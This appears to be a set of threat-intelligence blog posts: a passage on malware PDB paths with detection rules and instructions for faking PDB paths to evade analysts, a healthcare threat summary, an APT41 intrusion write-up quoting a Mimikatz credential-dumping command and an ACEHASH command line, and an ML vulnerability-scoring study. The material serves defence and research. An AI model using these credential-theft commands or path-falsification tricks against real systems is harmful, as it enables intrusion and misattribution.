HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT

APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

 

 

 

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of these samples below may be results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples are from confirmed malware samples.

Shenanigan

Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462

 

Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles

Text Path: C::\\QQQQQQQQ\VVVVVVVVVVVVVVVVV.pdb

Short

Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb

Regin

Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:

APT29

Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.

ConventionEngine

We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry jokes that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a code spaghetti mess of scripts and signatures, which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on Github being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy of putting full code packages right into the repositories and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
    condition:
        $hex at 0
rule PDB_Header_V7
{
    meta:
        author="@stvemillertime"
        description = "This looks for PDB files based on headers.
    strings:
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
    condition:
        $hex at 0
}

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under

D:\smiller\projects\offensive_loaders\shellcode\hello\hellol\Debug\


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.


Figure 18: hellol project Properties showing defaults for the PDB path


Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw ConsoleApplication1.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Or if built at the command line, you could specify /PDBALTPATH which can create a PDB file name that is does not rely on the file structure of the build computer.


Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.

Conclusions

If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely label their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB files are present, we identified anomalies that help us identify files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost to Western firms.
  • Healthcare databases for sale under $2,000:  The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 dollars (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.

Our knowledge of this group’s targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the threat actor’s ability to gain a foothold and/or prevent data exposure.

GET TO DA CHOPPA!

In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0 -m”

This specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection

Signature Name

China Chopper

FE_Webshell_JSP_CHOPPER_1

 

FE_Webshell_Java_CHOPPER_1

 

FE_Webshell_MSIL_CHOPPER_1

HIGHNOON.PASSIVE

FE_APT_Backdoor_Raw64_HIGHNOON_2

 

FE_APT_Backdoor_Win64_HIGHNOON_2

Certutil Downloader

CERTUTIL.EXE DOWNLOADER (UTILITY)

 

CERTUTIL.EXE DOWNLOADER A (UTILITY)

ACEHASH

FE_Trojan_AceHash

Indicators

Type

Indicator

MD5 Hash (if applicable)

File

test.jsp

84d6e4ba1f4268e50810dacc7bbc3935

File

64.dat

51e06382a88eb09639e1bc3565b444a6

File

Ins64.exe

e42555b218248d1a2ba92c1532ef6786

File

c64.exe

846cdb921841ac671c86350d494abf9c

File

F64.data

a919b4454679ef60b39c82bd686ed141

IP Address

67.229.97[.]229

N/A

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue. ­

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.


Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.


Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.


Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.


Figure 4: Tweet showing strong adjective use


Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.


Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

